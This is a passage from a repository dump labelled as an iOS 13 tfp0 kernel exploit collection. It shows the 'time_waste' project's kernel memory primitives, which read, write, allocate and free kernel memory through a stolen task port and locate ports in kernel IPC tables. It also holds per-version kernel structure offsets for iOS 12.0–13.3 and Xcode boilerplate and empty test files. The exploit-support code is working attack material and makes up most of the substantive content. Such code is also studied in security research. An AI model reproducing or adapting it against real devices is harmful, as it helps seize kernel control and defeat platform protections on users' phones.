59 | mach_msg_size_t message_size_for_kalloc_size(mach_msg_size_t kalloc_size);
60 | void trigger_gc(void);
61 |
62 | #endif /* exploit_utilities_h */
63 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/kernel_memory.c:
--------------------------------------------------------------------------------
1 | //
2 | // kernel_memory.c
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/18/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #import "kernel_memory.h"
10 |
11 | static mach_port_t tfpzero;
12 | static uint64_t task_self;
13 |
14 | void init_kernel_memory(mach_port_t tfp0, uint64_t our_port_addr) {
15 | tfpzero = tfp0;
16 | task_self = our_port_addr;
17 | }
18 |
19 | uint64_t kalloc(vm_size_t size) {
20 | mach_vm_address_t address = 0;
21 | mach_vm_allocate(tfpzero, (mach_vm_address_t *)&address, size, VM_FLAGS_ANYWHERE);
22 | return address;
23 | }
24 |
25 | void kfree(mach_vm_address_t address, vm_size_t size) {
26 | mach_vm_deallocate(tfpzero, address, size);
27 | }
28 |
29 | size_t kread(uint64_t where, void *p, size_t size) {
30 | int rv;
31 | size_t offset = 0;
32 | while (offset < size) {
33 | mach_vm_size_t sz, chunk = 2048;
34 | if (chunk > size - offset) {
35 | chunk = size - offset;
36 | }
37 | rv = mach_vm_read_overwrite(tfpzero, where + offset, chunk, (mach_vm_address_t)p + offset, &sz);
38 | if (rv || sz == 0) {
39 | printf("[-] error on kread(0x%016llx)\n", where);
40 | break;
41 | }
42 | offset += sz;
43 | }
44 | return offset;
45 | }
46 |
47 | uint32_t rk32(uint64_t where) {
48 | uint32_t out;
49 | kread(where, &out, sizeof(uint32_t));
50 | return out;
51 | }
52 |
53 | uint64_t rk64(uint64_t where) {
54 | uint64_t out;
55 | kread(where, &out, sizeof(uint64_t));
56 | return out;
57 | }
58 |
59 | size_t kwrite(uint64_t where, const void *p, size_t size) {
60 | int rv;
61 | size_t offset = 0;
62 | while (offset < size) {
63 | size_t chunk = 2048;
64 | if (chunk > size - offset) {
65 | chunk = size - offset;
66 | }
67 | rv = mach_vm_write(tfpzero, where + offset, (mach_vm_offset_t)p + offset, (int)chunk);
68 | if (rv) {
69 | printf("[-] error on kwrite(0x%016llx)\n", where);
70 | break;
71 | }
72 | offset += chunk;
73 | }
74 | return offset;
75 | }
76 |
77 | void wk32(uint64_t where, uint32_t what) {
78 | uint32_t _what = what;
79 | kwrite(where, &_what, sizeof(uint32_t));
80 | }
81 |
82 |
83 | void wk64(uint64_t where, uint64_t what) {
84 | uint64_t _what = what;
85 | kwrite(where, &_what, sizeof(uint64_t));
86 | }
87 |
88 | unsigned long kstrlen(uint64_t string) {
89 | if (!string) return 0;
90 |
91 | unsigned long len = 0;
92 | char ch = 0;
93 | int i = 0;
94 | while (true) {
95 | kread(string + i, &ch, 1);
96 | if (!ch) break;
97 | len++;
98 | i++;
99 | }
100 | return len;
101 | }
102 |
103 | int kstrcmp(uint64_t string1, uint64_t string2) {
104 | unsigned long len1 = kstrlen(string1);
105 | unsigned long len2 = kstrlen(string2);
106 |
107 | char *s1 = malloc(len1);
108 | char *s2 = malloc(len2);
109 | kread(string1, s1, len1);
110 | kread(string2, s2, len2);
111 |
112 | int ret = strcmp(s1, s2);
113 | free(s1);
114 | free(s2);
115 |
116 | return ret;
117 | }
118 |
119 | int kstrcmp_u(uint64_t string1, char *string2) {
120 | unsigned long len1 = kstrlen(string1);
121 |
122 | char *s1 = malloc(len1);
123 | kread(string1, s1, len1);
124 |
125 | int ret = strcmp(s1, string2);
126 | free(s1);
127 |
128 | return ret;
129 | }
130 |
131 | uint64_t find_port(mach_port_name_t port) {
132 | uint64_t task_addr = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
133 | uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));
134 | uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));
135 |
136 | uint32_t port_index = port >> 8;
137 | const int sizeof_ipc_entry_t = 0x18;
138 |
139 | uint64_t port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t));
140 |
141 | return port_addr;
142 | }
143 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/kernel_memory.h:
--------------------------------------------------------------------------------
1 | //
2 | // kernel_memory.h
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/18/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #ifndef kernel_memory_h
10 | #define kernel_memory_h
11 |
12 | #import
13 | #import
14 | #import
15 | #import
16 | #import "offsets.h"
17 |
18 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
19 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
20 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
21 | kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);;
22 | kern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);
23 | kern_return_t mach_vm_map(vm_map_t target_task, mach_vm_address_t *address, mach_vm_size_t size, mach_vm_offset_t mask, int flags, mem_entry_name_port_t object, memory_object_offset_t offset, boolean_t copy, vm_prot_t cur_protection, vm_prot_t max_protection, vm_inherit_t inheritance);
24 | kern_return_t mach_vm_region_recurse(vm_map_t target_task, mach_vm_address_t *address, mach_vm_size_t *size, natural_t *nesting_depth, vm_region_recurse_info_t info, mach_msg_type_number_t *infoCnt);
25 |
26 | void init_kernel_memory(mach_port_t tfp0, uint64_t our_port_addr);
27 |
28 | size_t kread(uint64_t where, void *p, size_t size);
29 | uint32_t rk32(uint64_t where);
30 | uint64_t rk64(uint64_t where);
31 |
32 | size_t kwrite(uint64_t where, const void *p, size_t size);
33 | void wk32(uint64_t where, uint32_t what);
34 | void wk64(uint64_t where, uint64_t what);
35 |
36 | void kfree(mach_vm_address_t address, vm_size_t size);
37 | uint64_t kalloc(vm_size_t size);
38 |
39 | int kstrcmp(uint64_t string1, uint64_t string2);
40 | int kstrcmp_u(uint64_t string1, char *string2);
41 | unsigned long kstrlen(uint64_t string);
42 |
43 | uint64_t find_port(mach_port_name_t port);
44 |
45 | #endif /* kernel_memory_h */
46 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/main.m:
--------------------------------------------------------------------------------
1 | //
2 | // main.m
3 | // time_waste
4 | //
5 | // Created by Jake James on 2/22/20.
6 | // Copyright © 2020 Jake James. All rights reserved.
7 | //
8 |
9 | #import
10 | #import "AppDelegate.h"
11 |
12 | int main(int argc, char * argv[]) {
13 | NSString * appDelegateClassName;
14 | @autoreleasepool {
15 | // Setup code that might create autoreleased objects goes here.
16 | appDelegateClassName = NSStringFromClass([AppDelegate class]);
17 | }
18 | return UIApplicationMain(argc, argv, nil, appDelegateClassName);
19 | }
20 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/offsets.h:
--------------------------------------------------------------------------------
1 | enum kstruct_offset {
2 | /* struct task */
3 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
4 | KSTRUCT_OFFSET_TASK_REF_COUNT,
5 | KSTRUCT_OFFSET_TASK_ACTIVE,
6 | KSTRUCT_OFFSET_TASK_VM_MAP,
7 | KSTRUCT_OFFSET_TASK_NEXT,
8 | KSTRUCT_OFFSET_TASK_PREV,
9 | KSTRUCT_OFFSET_TASK_ITK_SELF,
10 | KSTRUCT_OFFSET_TASK_ITK_SPACE,
11 | KSTRUCT_OFFSET_TASK_BSD_INFO,
12 |
13 | /* struct ipc_port */
14 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
15 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
16 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
17 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
18 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
19 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
20 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
21 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
22 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
23 |
24 | /* struct proc */
25 | KSTRUCT_OFFSET_PROC_TASK,
26 | KSTRUCT_OFFSET_PROC_PID,
27 | KSTRUCT_OFFSET_PROC_P_FD,
28 |
29 | /* struct filedesc */
30 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
31 |
32 | /* struct fileproc */
33 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB,
34 |
35 | /* struct fileglob */
36 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA,
37 |
38 | /* struct socket */
39 | KSTRUCT_OFFSET_SOCKET_SO_PCB,
40 |
41 | /* struct pipe */
42 | KSTRUCT_OFFSET_PIPE_BUFFER,
43 |
44 | /* struct ipc_space */
45 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
46 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,
47 | KSTRUCT_OFFSET_IPC_SPACE_IS_TASK,
48 |
49 | KFREE_ADDR_OFFSET,
50 |
51 | IOSURFACE_CREATE_OUTSIZE,
52 |
53 | OFFSET_GETFI,
54 | };
55 |
56 | int koffset(enum kstruct_offset offset);
57 | int init_offsets(void);
58 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/offsets.m:
--------------------------------------------------------------------------------
1 | #import
2 | #import
3 |
4 | #import
5 | #import
6 | #import
7 | #import
8 | #import
9 |
10 | #import "offsets.h"
11 |
12 | #define SYSTEM_VERSION_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame)
13 | #define SYSTEM_VERSION_GREATER_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedDescending)
14 | #define SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedAscending)
15 | #define SYSTEM_VERSION_LESS_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedAscending)
16 | #define SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedDescending)
17 |
18 | int* offsets = NULL;
19 |
20 | int kstruct_offsets_13_0[] = {
21 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
22 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
23 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
24 | 0x28, // KSTRUCT_OFFSET_TASK_VM_MAP,
25 | 0x30, // KSTRUCT_OFFSET_TASK_NEXT,
26 | 0x38, // KSTRUCT_OFFSET_TASK_PREV,
27 | 0x108, // KSTRUCT_OFFSET_TASK_ITK_SELF,
28 | 0x320, // KSTRUCT_OFFSET_TASK_ITK_SPACE,
29 |
30 | #if __arm64e__
31 | 0x388, // KSTRUCT_OFFSET_TASK_BSD_INFO,
32 | #else
33 | 0x380, // KSTRUCT_OFFSET_TASK_BSD_INFO,
34 | #endif
35 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
36 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
37 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
38 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
39 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
40 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
41 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
42 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
43 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
44 |
45 | 0x10, // KSTRUCT_OFFSET_PROC_TASK,
46 | 0x68, // KSTRUCT_OFFSET_PROC_PID,
47 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD
48 |
49 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
50 |
51 | 0x10, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
52 |
53 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
54 |
55 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB
56 |
57 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER
58 |
59 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
60 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
61 | 0x28, // KSTRUCT_OFFSET_IPC_SPACE_IS_TASK
62 |
63 | 0x7c, // KFREE_ADDR_OFFSET
64 |
65 | 0xdd0, // IOSURFACE_CREATE_OUTSIZE
66 |
67 | 0xb8, // getExternalTrapForIndex
68 | };
69 |
70 | int kstruct_offsets_12_0[] = {
71 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
72 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
73 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
74 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
75 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT,
76 | 0x30, // KSTRUCT_OFFSET_TASK_PREV,
77 | 0xd8, // KSTRUCT_OFFSET_TASK_ITK_SELF,
78 | 0x300, // KSTRUCT_OFFSET_TASK_ITK_SPACE,
79 |
80 | #if __arm64e__
81 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
82 | #else
83 | 0x358, // KSTRUCT_OFFSET_TASK_BSD_INFO,
84 | #endif
85 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
86 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
87 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
88 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
89 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
90 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
91 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
92 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
93 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
94 |
95 | 0x10, // KSTRUCT_OFFSET_PROC_TASK,
96 | 0x60, // KSTRUCT_OFFSET_PROC_PID,
97 | 0x100, // KSTRUCT_OFFSET_PROC_P_FD
98 |
99 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
100 |
101 | 0x10, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
102 |
103 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
104 |
105 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB
106 |
107 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER
108 |
109 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
110 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
111 | 0x28, // KSTRUCT_OFFSET_IPC_SPACE_IS_TASK
112 |
113 | 0x7c, // KFREE_ADDR_OFFSET
114 |
115 | 0xdd0, // IOSURFACE_CREATE_OUTSIZE
116 |
117 | 0xb7, // getExternalTrapForIndex
118 | };
119 |
120 | int koffset(enum kstruct_offset offset) {
121 | if (offsets == NULL) {
122 | printf("[-] Please call init_offsets() prior to querying offsets\n");
123 | return 0;
124 | }
125 | return offsets[offset];
126 | }
127 |
128 | uint32_t create_outsize;
129 |
130 | int init_offsets() {
131 | if (SYSTEM_VERSION_GREATER_THAN(@"13.3")) {
132 | printf("[-] iOS version too high, 13.3 or lower required\n");
133 | return 1;
134 | }
135 | else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@"13.0")) {
136 | printf("[i] Offsets selected for iOS 13.0 or above\n");
137 | offsets = kstruct_offsets_13_0;
138 | return 0;
139 | }
140 | else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@"12.0")) {
141 | printf("[i] Offsets selected for iOS 12.0 or above\n");
142 | offsets = kstruct_offsets_12_0;
143 | return 0;
144 | }
145 | else {
146 | printf("[-] iOS version too low, 13.0 or higher required\n");
147 | return 2;
148 | }
149 | }
150 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_wasteTests/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | $(PRODUCT_BUNDLE_PACKAGE_TYPE)
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 |
22 |
23 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_wasteTests/time_wasteTests.m:
--------------------------------------------------------------------------------
1 | //
2 | // time_wasteTests.m
3 | // time_wasteTests
4 | //
5 | // Created by Jake James on 2/22/20.
6 | // Copyright © 2020 Jake James. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface time_wasteTests : XCTestCase
12 |
13 | @end
14 |
15 | @implementation time_wasteTests
16 |
17 | - (void)setUp {
18 | // Put setup code here. This method is called before the invocation of each test method in the class.
19 | }
20 |
21 | - (void)tearDown {
22 | // Put teardown code here. This method is called after the invocation of each test method in the class.
23 | }
24 |
25 | - (void)testExample {
26 | // This is an example of a functional test case.
27 | // Use XCTAssert and related functions to verify your tests produce the correct results.
28 | }
29 |
30 | - (void)testPerformanceExample {
31 | // This is an example of a performance test case.
32 | [self measureBlock:^{
33 | // Put the code you want to measure the time of here.
34 | }];
35 | }
36 |
37 | @end
38 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_wasteUITests/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | $(PRODUCT_BUNDLE_PACKAGE_TYPE)
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 |
22 |
23 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_wasteUITests/time_wasteUITests.m:
--------------------------------------------------------------------------------
1 | //
2 | // time_wasteUITests.m
3 | // time_wasteUITests
4 | //
5 | // Created by Jake James on 2/22/20.
6 | // Copyright © 2020 Jake James. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface time_wasteUITests : XCTestCase
12 |
13 | @end
14 |
15 | @implementation time_wasteUITests
16 |
17 | - (void)setUp {
18 | // Put setup code here. This method is called before the invocation of each test method in the class.
19 |
20 | // In UI tests it is usually best to stop immediately when a failure occurs.
21 | self.continueAfterFailure = NO;
22 |
23 | // In UI tests it’s important to set the initial state - such as interface orientation - required for your tests before they run. The setUp method is a good place to do this.
24 | }
25 |
26 | - (void)tearDown {
27 | // Put teardown code here. This method is called after the invocation of each test method in the class.
28 | }
29 |
30 | - (void)testExample {
31 | // UI tests must launch the application that they test.
32 | XCUIApplication *app = [[XCUIApplication alloc] init];
33 | [app launch];
34 |
35 | // Use recording to get started writing UI tests.
36 | // Use XCTAssert and related functions to verify your tests produce the correct results.
37 | }
38 |
39 | - (void)testLaunchPerformance {
40 | if (@available(macOS 10.15, iOS 13.0, tvOS 13.0, *)) {
41 | // This measures how long it takes to launch your application.
42 | [self measureWithMetrics:@[XCTOSSignpostMetric.applicationLaunchMetric] block:^{
43 | [[[XCUIApplication alloc] init] launch];
44 | }];
45 | }
46 | }
47 |
48 | @end
49 |
--------------------------------------------------------------------------------